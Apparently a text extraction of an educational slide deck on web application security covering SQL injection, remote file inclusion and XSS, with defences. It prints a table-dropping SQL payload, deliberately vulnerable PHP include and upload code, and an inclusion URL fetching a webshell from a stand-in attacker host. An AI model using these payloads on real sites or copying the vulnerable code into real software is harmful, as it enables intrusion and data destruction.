Web Application Security

Web Application
Security
Slides by: Ynon Perek
ynon@ynonperek.com
http://ynonperek.com
Monday, April 29, 13

Agenda
n Intro to Web Security
n Web Application Architecture
n Code Injections
n Request Forgeries
n Losing Trust

Reasons for Security

Reasons for Security
n Reliable systems are secure
n Security of a system = Security of the weakest part
n Hard to ﬁx after system is ready
n Everyone should care

How It All Started
n John Draper (Cap’n
Crunch)
n phreaking in the 70s

How It All Started
n 1986 Brain
n 1988 Morris
n Both (meant as) harmless
n Lead to CERT

How It All Started
n 90s gave birth to phishing
attacks
n AOL being the ﬁrst victim

How It All Started
n Security became an issue
n 2003 Summer of worms
n Blaster, Nachi, SoBig

IT Security Today
NPR.org Hacked; 'Syrian Electronic
Army' Takes Responsibility
April 16,

IT Security Today

IT Security Today
‫מטוס‬ ‫להפיל‬ ‫כדי‬ ‫שצריך‬ ‫מה‬ ‫כל‬ ,‫פחד‬ ‫איזה‬
‫אנדרואיד‬ ‫זה‬
.‫אחת‬ ‫תגובה‬ .10:04 ,2013 ‫באפריל‬ 12 ‫רז‬ ‫זהבי‬ ‫נועה‬ ‫מאת‬
‫סלולר‬ ,‫מידע‬ ‫אבטחת‬ ‫לקטגוריות‬ ‫שייך‬
‫אבטחה‬ ‫פריצת‬ ‫ישנה‬ ‫הפיקוח‬ ‫מגדלי‬ ‫בתוכנות‬ ‫כי‬ ‫גילה‬ ‫האקר‬
.‫ההודעה‬ ‫את‬ ‫לו‬ ‫שולח‬ ‫באמת‬ ‫מי‬ ‫לדעת‬ ‫יכול‬ ‫לא‬ ‫הטייס‬ – ‫חמורה‬
‫ואף‬ ‫מטוס‬ ‫על‬ ‫להשתלט‬ ‫ניתן‬ ‫שפיתח‬ ‫אפליקצייה‬ ‫באמצעות‬
‫לרסקו‬

Why Is It Hard ?
n Secure code problems:
n Lack of knowledge
n Carelessness

Secure From The Start
n Fixing security errors after coding is expensive
n Writing secure code is easy

Web Applications

Web Architecture
Client Server
GET Data
Send Response

Server Side
n Creates data and sends
back to client
n Data can be: HTML,
JSON, XML, Images and
more
n Choose your ﬂavor

Server Side Flaws
n Code injections
n Information leak

Client Side
n Web browser takes data
and renders on screen
n Browsers: IE, Firefox,
Chrome, Safari
n Languages: JavaScript,
ActionScript, Java
(Applets)

Client Side Flaws
n Code injections
n Information leak

Web Weakness
n Client-Server gap is too easy
n HTTP is state-less
n Many different technologies and vendors
n Code/Data intermix
n It’s way more complicated than it looks

Code Injections
n Query Injections (SQL, XPath, LDAP)
n Remote File Inclusion
n JavaScript Injections ( XSS, CSRF )

SQL Injections
n Started in 1999
n (Probably) the most famous technique
n 83% of data breaches 2005-2011
n attack rate: 70 attempts / hour

Famous Victims
n (2002) guess.com revealed 200K customer names
and credit cards
n (2007) Microsoft UK Defacement
n (2009) RockYou DB hacked for 30Mil users
n (2011) MySql.com hacked
n (2012) Yahoo lost 450K login credentials

SQL Injections

What Did Bobby Break
$query = "SELECT name, grade " +
"FROM students " +
"WHERE name = '$user'"

What Did Bobby Break
$query = "SELECT name, grade " +
"FROM students " +
"WHERE name = 'Robert'; DROP TABLE students'"
Expected data
got code

SQLi Examples
n See if you can log in
n Login form code:
https://github.com/ynonp/web-security-demos/
blob/master/lib/WebSecurity/Demos/Controller/
SQLInjection/Login.pm

SQLi Example
n See if you can print out names and passwords
n https://github.com/ynonp/web-security-demos/
SQLInjection/InfoLeak.pm

Affected Languages
n All programming languages
n Usually found in ASP, Java, Perl and PHP

Bug Spotting
n Search for code that:
n Takes user input
n Does not validate input
n Uses input to talk to DB

Bug Spotting
n In code review
n Find DB code
n Make sure its input is sanitized

Black-Box Spotting
n Many automated tools will
help you ﬁnd SQL
Inejctions
n Popular: Havij
http://www.itsecteam.com/
products/havij-v116-
advanced-sql-injection/

How To Avoid
n Use prepared statements
n Demo:
SELECT name, grade FROM students
WHERE name=?
? are later bound
to data

How To Avoid
n Sanitize your input. Always
n Demo:
if ( ! $name =~ /^[a-z]+$/ ) {
die "Invalid Input";
}

if ( ! $age =~ /^[0-9]+$/ ) {
die "Invalid Input";
}

Extra Precautions
n Keep users passwords hashed in the DB
n Encrypt important data in DB
n Microsoft URLScan
n TrustWave ModSecurity (Open Source)

Q & A
SQL Injections

Remote File Inclusion
n Users upload files
n Some files are dangerous
n OR
n Server loads files based on user input

The Risk
<?php
if (isset( $_GET['COLOR'] ) ){
include( $_GET['COLOR'] . '.php' );
}
?>
With
/vulnerable.php?COLOR=http://
evil.example.com/webshell.txt

Local File Inclusion
n Other bugs allow attacker to upload a PHP ﬁle to
your server
n Usually missing upload ﬁle name tests

Demo: imgur

The Risk
Server
Save editor.php
upload.php
uploads/editor.php

Remote File Demo
if ($_POST['url']) {
$uploaddir = $_POST['url'];
}

$first_filename = $_FILES['uploadfile']['name'];
$filename = md5($first_filename);
$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
$file = $uploaddir . basename($filename . '.' . $ext);

if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
echo basename($filename . '.' . $ext);
} else {
echo 'error';
}

Example: OpenBB
PHP remote file inclusion vulnerability in Open
Bulletin Board (OpenBB) 1.0.8 and earlier allows
remote attackers to execute arbitrary PHP code
via a URL in the root_path parameter to (1)
index.php and possibly (2) collector.php.
CVE-2006-4722

Bug Spotting
n Search for code that loads external files
n Search for code that stores external files
n Make sure file name is sanitized

How To Avoid
n Avoid by sanitizing your input
n Don’t allow uploads if you don’t have to

Other Injections
n XPath Injection
n LDAP Injection

Demo
n Try to ﬁnd a company’s id using:
XPathInjection/Leak.pm

Client-Side Injections
n A relatively new category of injections uses Client
Side languages (mainly JavaScript)
n Attacker uses website to attack other users

JavaScript Injections
Evil Hacker
Honest User
Web
Application
(Email)
Send message to
honest user
Message includes
evil JS code

JavaScript Security
n Browsers use a security policy called
“Same Origin Policy”
n A page has an origin
n Some actions are restricted to the page’s origin

JavaScript Risks
n Same Origin Policy protects the following:
n Unauthorized access to cookies
n Unauthorized access to canvas
n Unauthorized AJAX calls

Famous Injections
n XSS is the most famous JavaScript injection
n Variants: Inject code to ﬂash

Famous Injections

Famous Injections
Twitter, Sep 2010

Famous Injections
Yahoo, Jan 2013

Famous Injections
n “Sammy Is My Hero”
n (2005) Sammy’s worm infected a Million accounts
in less than 20 hours

Examples
n Throwing users out of a public chat room
n Getting a user to send a “fake” message
JSInjection/Chatter.pm

Examples
n Hijacking a user’s session through messaging
n Getting a user to send a fake message
XSS/SessionHijack.pm

Bug Spotting
n Search for code that writes markup to user
n Verify all output is sanitized

Bug Spotting
n http://
xsser.sourceforge.net/
n Python script that detects
XSS bugs in sites

Avoiding The Bug
n Use the framework
n Sanitize your output
n Consider other users

Q & A
Client-Side Injections

Code Weak Spots
n Injections are more likely
to occur in:
n Cookies
n HTTP Headers
n Don’t forget to sanitize
these too

Web Security
n Security of a system = the weakest part
n System breaches usually involve more than one
vulnerability
n Use the power of frameworks

Thanks For Listening
n Ynon Perek
n http://ynonperek.com
n ynon@ynonperek.com

Web Application Security

More Related Content

Viewers also liked

Similar to Web Application Security

More from Ynon Perek

Recently uploaded

Web Application Security